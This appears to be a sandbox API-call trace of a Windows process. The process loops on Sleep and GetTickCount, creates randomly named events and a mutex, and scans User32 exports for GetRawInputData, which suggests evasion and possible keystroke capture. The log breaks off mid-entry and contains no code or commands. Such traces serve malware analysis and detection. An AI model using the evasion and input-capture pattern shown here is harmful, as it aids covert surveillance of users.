0x644290 [0196.594] GetProcessHeap () returned 0x610000 [0196.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x19) returned 0x644268 [0196.594] Sleep (dwMilliseconds=0x1) [0196.607] GetTickCount () returned 0x113ef6e [0196.607] Sleep (dwMilliseconds=0x1) [0196.623] GetTickCount () returned 0x113ef7e [0196.623] Sleep (dwMilliseconds=0x1) [0196.638] GetTickCount () returned 0x113ef8d [0196.639] Sleep (dwMilliseconds=0x1) [0196.655] GetTickCount () returned 0x113ef9d [0196.655] Sleep (dwMilliseconds=0x1) [0196.691] GetTickCount () returned 0x113efbc [0196.691] Sleep (dwMilliseconds=0x1) [0196.701] GetTickCount () returned 0x113efcc [0196.701] Sleep (dwMilliseconds=0x1) [0196.716] GetTickCount () returned 0x113efdb [0196.716] Sleep (dwMilliseconds=0x1) [0196.732] GetTickCount () returned 0x113efeb [0196.732] Sleep (dwMilliseconds=0x1) [0196.748] GetTickCount () returned 0x113effa [0196.748] Sleep (dwMilliseconds=0x1) [0197.160] GetTickCount () returned 0x113f01a [0197.161] Sleep (dwMilliseconds=0x1) [0197.169] GetTickCount () returned 0x113f029 [0197.169] Sleep (dwMilliseconds=0x1) [0197.184] GetTickCount () returned 0x113f039 [0197.184] Sleep (dwMilliseconds=0x1) [0197.213] GetTickCount () returned 0x113f048 [0197.213] Sleep (dwMilliseconds=0x1) [0197.216] GetTickCount () returned 0x113f058 [0197.216] Sleep (dwMilliseconds=0x1) [0197.231] GetTickCount () returned 0x113f068 [0197.231] Sleep (dwMilliseconds=0x1) [0197.247] GetTickCount () returned 0x113f077 [0197.247] Sleep (dwMilliseconds=0x1) [0197.262] GetTickCount () returned 0x113f087 [0197.262] Sleep (dwMilliseconds=0x1) [0197.278] GetTickCount () returned 0x113f096 [0197.279] Sleep (dwMilliseconds=0x1) [0197.294] GetTickCount () returned 0x113f0a6 [0197.294] Sleep (dwMilliseconds=0x1) [0197.309] GetTickCount () returned 0x113f0b6 [0197.309] Sleep (dwMilliseconds=0x1) [0197.325] GetTickCount () returned 0x113f0c5 [0197.325] Sleep (dwMilliseconds=0x1) [0197.341] GetTickCount () returned 0x113f0d5 [0197.341] Sleep (dwMilliseconds=0x1) [0197.356] GetTickCount () returned 0x113f0e4 [0197.356] Sleep (dwMilliseconds=0x1) [0197.372] GetTickCount () returned 0x113f0f4 [0197.372] Sleep (dwMilliseconds=0x1) [0197.387] GetTickCount () returned 0x113f104 [0197.387] Sleep (dwMilliseconds=0x1) [0197.403] GetTickCount () returned 0x113f113 [0197.403] Sleep (dwMilliseconds=0x1) [0197.419] GetTickCount () returned 0x113f123 [0197.419] Sleep (dwMilliseconds=0x1) [0197.434] GetTickCount () returned 0x113f132 [0197.434] Sleep (dwMilliseconds=0x1) [0197.450] GetTickCount () returned 0x113f142 [0197.450] Sleep (dwMilliseconds=0x1) [0197.465] GetTickCount () returned 0x113f152 [0197.465] Sleep (dwMilliseconds=0x1) [0197.482] GetTickCount () returned 0x113f161 [0197.482] Sleep (dwMilliseconds=0x1) [0197.496] GetTickCount () returned 0x113f171 [0197.496] Sleep (dwMilliseconds=0x1) [0197.663] GetTickCount () returned 0x113f180 [0197.663] Sleep (dwMilliseconds=0x1) [0197.668] GetTickCount () returned 0x113f190 [0197.668] Sleep (dwMilliseconds=0x1) [0197.684] GetTickCount () returned 0x113f1a0 [0197.684] Sleep (dwMilliseconds=0x1) [0197.699] GetTickCount () returned 0x113f1af [0197.699] Sleep (dwMilliseconds=0x1) [0197.717] GetTickCount () returned 0x113f1bf [0197.717] Sleep (dwMilliseconds=0x1) [0197.730] GetTickCount () returned 0x113f1ce [0197.730] Sleep (dwMilliseconds=0x1) [0197.746] GetTickCount () returned 0x113f1de [0197.746] Sleep (dwMilliseconds=0x1) [0197.762] GetTickCount () returned 0x113f1ee [0197.762] Sleep (dwMilliseconds=0x1) [0197.777] GetTickCount () returned 0x113f1fd [0197.777] Sleep (dwMilliseconds=0x1) [0197.793] GetTickCount () returned 0x113f20d [0197.793] Sleep (dwMilliseconds=0x1) [0197.808] GetTickCount () returned 0x113f21c [0197.808] Sleep (dwMilliseconds=0x1) [0197.824] GetTickCount () returned 0x113f22c [0197.824] Sleep (dwMilliseconds=0x1) [0197.840] GetTickCount () returned 0x113f23c [0197.840] Sleep (dwMilliseconds=0x1) [0197.855] GetTickCount () returned 0x113f24b [0197.855] Sleep (dwMilliseconds=0x1) [0197.871] GetTickCount () returned 0x113f25b [0197.871] Sleep (dwMilliseconds=0x1) [0197.886] GetTickCount () returned 0x113f26a [0197.886] Sleep (dwMilliseconds=0x1) [0197.903] GetTickCount () returned 0x113f27a [0197.903] Sleep (dwMilliseconds=0x1) [0197.918] GetTickCount () returned 0x113f28a [0197.918] Sleep (dwMilliseconds=0x1) [0197.934] GetTickCount () returned 0x113f299 [0197.934] Sleep (dwMilliseconds=0x1) [0197.949] GetTickCount () returned 0x113f2a9 [0197.949] Sleep (dwMilliseconds=0x1) [0197.967] GetTickCount () returned 0x113f2b8 [0197.967] Sleep (dwMilliseconds=0x1) [0197.981] GetTickCount () returned 0x113f2c8 [0197.981] Sleep (dwMilliseconds=0x1) [0198.000] GetTickCount () returned 0x113f2d8 [0198.000] Sleep (dwMilliseconds=0x1) [0198.012] GetTickCount () returned 0x113f2e7 [0198.012] Sleep (dwMilliseconds=0x1) [0198.042] GetTickCount () returned 0x113f306 [0198.042] Sleep (dwMilliseconds=0x1) [0198.060] GetTickCount () returned 0x113f316 [0198.060] Sleep (dwMilliseconds=0x1) [0198.077] GetTickCount () returned 0x113f326 [0198.077] Sleep (dwMilliseconds=0x1) [0198.092] GetTickCount () returned 0x113f335 [0198.092] lstrlenA (lpString="aqnQyAXoum") returned 10 [0198.092] lstrlenA (lpString="aqnQyAXoum") returned 10 [0198.092] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.092] lstrcpyA (in: lpString1=0x5e0000, lpString2="aqnQyAXoum" | out: lpString1="aqnQyAXoum") returned="aqnQyAXoum" [0198.093] VirtualFree (lpAddress=0x320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.093] lstrlenA (lpString="aqnQyAXoum") returned 10 [0198.093] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x320000 [0198.093] lstrcatA (in: lpString1="", lpString2="aqnQyAXoum" | out: lpString1="aqnQyAXoum") returned="aqnQyAXoum" [0198.093] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="aqnQyAXoum") returned 0x144 [0198.093] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.093] lstrlenA (lpString="b2AyY2NaI4") returned 10 [0198.093] lstrlenA (lpString="b2AyY2NaI4") returned 10 [0198.093] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.094] lstrcpyA (in: lpString1=0x5e0000, lpString2="b2AyY2NaI4" | out: lpString1="b2AyY2NaI4") returned="b2AyY2NaI4" [0198.094] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.094] lstrlenA (lpString="b2AyY2NaI4") returned 10 [0198.094] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0198.094] lstrcatA (in: lpString1="", lpString2="b2AyY2NaI4" | out: lpString1="b2AyY2NaI4") returned="b2AyY2NaI4" [0198.094] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="b2AyY2NaI4") returned 0x148 [0198.094] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.094] lstrlenA (lpString="76UYyib4Ke") returned 10 [0198.094] lstrlenA (lpString="76UYyib4Ke") returned 10 [0198.094] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.095] lstrcpyA (in: lpString1=0x5e0000, lpString2="76UYyib4Ke" | out: lpString1="76UYyib4Ke") returned="76UYyib4Ke" [0198.095] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.095] lstrlenA (lpString="76UYyib4Ke") returned 10 [0198.095] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0198.095] lstrcatA (in: lpString1="", lpString2="76UYyib4Ke" | out: lpString1="76UYyib4Ke") returned="76UYyib4Ke" [0198.095] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="76UYyib4Ke") returned 0x188 [0198.095] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.095] lstrlenA (lpString="dAoQ6OpqME") returned 10 [0198.095] lstrlenA (lpString="dAoQ6OpqME") returned 10 [0198.095] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.096] lstrcpyA (in: lpString1=0x5e0000, lpString2="dAoQ6OpqME" | out: lpString1="dAoQ6OpqME") returned="dAoQ6OpqME" [0198.096] VirtualFree (lpAddress=0x3d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.096] lstrlenA (lpString="dAoQ6OpqME") returned 10 [0198.096] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0198.096] lstrcatA (in: lpString1="", lpString2="dAoQ6OpqME" | out: lpString1="dAoQ6OpqME") returned="dAoQ6OpqME" [0198.096] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="dAoQ6OpqME") returned 0x18c [0198.096] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.096] lstrlenA (lpString="9w8IW43KOW") returned 10 [0198.096] lstrlenA (lpString="9w8IW43KOW") returned 10 [0198.096] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.097] lstrcpyA (in: lpString1=0x5e0000, lpString2="9w8IW43KOW" | out: lpString1="9w8IW43KOW") returned="9w8IW43KOW" [0198.097] VirtualFree (lpAddress=0x3e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.097] lstrlenA (lpString="9w8IW43KOW") returned 10 [0198.097] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x3e0000 [0198.097] lstrcatA (in: lpString1="", lpString2="9w8IW43KOW" | out: lpString1="9w8IW43KOW") returned="9w8IW43KOW" [0198.097] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="9w8IW43KOW") returned 0x190 [0198.097] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.097] lstrlenA (lpString="f0kAekEamu") returned 10 [0198.097] lstrlenA (lpString="f0kAekEamu") returned 10 [0198.097] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.098] lstrcpyA (in: lpString1=0x5e0000, lpString2="f0kAekEamu" | out: lpString1="f0kAekEamu") returned="f0kAekEamu" [0198.098] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.098] lstrlenA (lpString="f0kAekEamu") returned 10 [0198.098] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0198.098] lstrcatA (in: lpString1="", lpString2="f0kAekEamu" | out: lpString1="f0kAekEamu") returned="f0kAekEamu" [0198.098] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="f0kAekEamu") returned 0x194 [0198.098] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.119] GetProcessHeap () returned 0x610000 [0198.119] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x54) returned 0x646bb8 [0198.146] GetProcessHeap () returned 0x610000 [0198.147] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x7c) returned 0x648450 [0198.147] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x198 [0198.147] LoadLibraryW (lpLibFileName="User32.dll") returned 0x75b00000 [0198.184] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0198.184] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0198.185] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CheckDesktopByThreadId", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0198.186] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0198.187] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0198.188] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DeviceEventWorker", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0198.189] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned 